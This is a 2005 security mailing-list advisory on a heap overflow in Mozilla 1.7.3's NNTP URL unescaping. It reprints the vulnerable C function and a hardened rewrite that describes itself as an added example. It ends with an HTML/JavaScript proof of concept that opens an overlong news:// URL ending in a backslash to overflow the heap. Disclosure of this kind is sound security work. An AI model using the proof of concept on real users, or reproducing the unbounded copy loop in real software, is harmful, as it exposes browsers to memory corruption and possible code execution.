Date: 2 Jan 2005 17:06:08 +0200
From: SecuriTeam <support@securiteam.com>
To: [email protected]
Subject: [UNIX] Mozilla Browser NNTP Heap Overflow
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mozilla Browser NNTP Heap Overflow
------------------------------------------------------------------------
SUMMARY
A critical security vulnerability has been found in Mozilla Project code
handling NNTP protocol.
DETAILS
Vulnerable Systems:
* Mozilla Browser version 1.7.3 and prior with mozilla-mail
Immune Systems:
* Mozilla Browser version 1.7.5 or newer
The Mozilla browser supports NNTP URLs, so a remote page can make the
client open a news:// connection to any server. Maurycy Prodeus found a
flaw in the NNTP handling code that may cause a heap overflow and allow a
remote attacker to execute arbitrary code on the client machine.
Buggy function from nsNNTPProtocol.cpp:
char *MSG_UnEscapeSearchUrl (const char *commandSpecificData)
{
  char *result = (char*) PR_Malloc (PL_strlen(commandSpecificData) + 1);
  if (result)
  {
    char *resultPtr = result;
    while (1)
    {
      char ch = *commandSpecificData++;
      if (!ch)
        break;
      if (ch == '\\')
      {
        /* No check that two bytes remain after the backslash: a trailing
           '\\' makes the two reads below consume the NUL terminator, so the
           loop keeps copying past the end of the source string into a
           result buffer that is only strlen+1 bytes long. */
        char scratchBuf[3];
        scratchBuf[0] = (char) *commandSpecificData++;
        scratchBuf[1] = (char) *commandSpecificData++;
        scratchBuf[2] = '\0';
        int accum = 0;
        PR_sscanf(scratchBuf, "%X", &accum);
        *resultPtr++ = (char) accum;
      }
      else
        *resultPtr++ = ch;
    }
    *resultPtr = '\0';
  }
  return result;
}
When commandSpecificData points to the last character of the string (the
next byte is the NUL terminator) and that character is '\\', the copying
loop consumes the terminator, continues past the end of the source array,
and overflows the result buffer.
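A hardened version of the same unescape loop, written here as an added example (it is not Mozilla's own patch for bug 264388, and the function and helper names are my own): it computes the end of the source string up front and only treats a backslash as an escape when two hex digits actually follow it, so a trailing backslash can neither consume the NUL terminator nor push the copy past the end of the source. A backslash that is not followed by two hex digits is copied literally, a design choice that differs from the original's PR_sscanf behaviour on malformed input.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Value of a hex digit, or -1 if c is not one. */
static int hex_val(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Bounded re-implementation of the unescape routine (added example, not
 * Mozilla's fix). Every read is checked against `end`, the address of the
 * terminating NUL, so the loop can never run past the source string and the
 * output can never exceed strlen(src) bytes: each "\XY" shrinks to one byte
 * and every other byte is copied one-for-one. */
char *unescape_search_url_safe(const char *src)
{
    size_t len = strlen(src);
    char *result = malloc(len + 1);
    if (!result)
        return NULL;

    const char *end = src + len;   /* points at the NUL terminator */
    char *out = result;
    while (src < end) {
        char ch = *src++;
        if (ch == '\\' && (end - src) >= 2 &&
            hex_val((unsigned char)src[0]) >= 0 &&
            hex_val((unsigned char)src[1]) >= 0) {
            /* A complete "\XY" escape: decode it and skip the two digits. */
            int hi = hex_val((unsigned char)src[0]);
            int lo = hex_val((unsigned char)src[1]);
            *out++ = (char)((hi << 4) | lo);
            src += 2;
        } else {
            /* Literal byte, including a lone or trailing backslash. */
            *out++ = ch;
        }
    }
    *out = '\0';
    return result;
}

/* Helper for checking results: unescape `in`, compare with `expected`,
 * release the buffer, and report whether they matched. */
int unescape_equals(const char *in, const char *expected)
{
    char *r = unescape_search_url_safe(in);
    if (!r)
        return 0;
    int same = strcmp(r, expected) == 0;
    free(r);
    return same;
}

int main(void)
{
    /* Constructed inputs: the last two end in a backslash, which is the
     * case that overflows the original routine. */
    const char *inputs[] = { "A\\41B", "\\2Fprofile", "\\4", "AAA\\", "\\" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        char *r = unescape_search_url_safe(inputs[i]);
        printf("%-12s -> %s\n", inputs[i], r ? r : "(alloc failed)");
        free(r);
    }
    return 0;
}
```

Because the output is bounded by the input length, the strlen+1 allocation is sufficient by construction; the trailing-backslash inputs in main come back unchanged instead of dragging heap memory into the result.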
Solution:
This bug is fixed in Mozilla 1.7.5 (Bug 264388). Mozilla developer Dan
Veditz claims that it is not exploitable: "A '\' on the end will
certainly trash memory, but at that point you're no longer reading
attacker-supplied data;".
On my RedHat 9.0 with Mozilla 1.7.3, the attached proof of concept code
overflows the buffer using attacker-supplied data. I decided to make this
bug public because the Mozilla Team hasn't warned users.
Proof of concept:
<html>
<script>
i = "news://news.individual.net/AAAAAAAAAAAAAA?";
for(l = 0; l < 16376; l++)
i=i+"A";
i=i+"/?profile/";
for(l = 0; l < 16384; l++)
i=i+"A";
i=i+"\\";
window.open(i);
</script>
</html>
ADDITIONAL INFORMATION
The information has been provided by <mailto:z33d@isec.pl> Maurycy
Prodeus.
The original article can be found at:
<http://isec.pl/vulnerabilities/isec-0020-mozilla.txt>
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.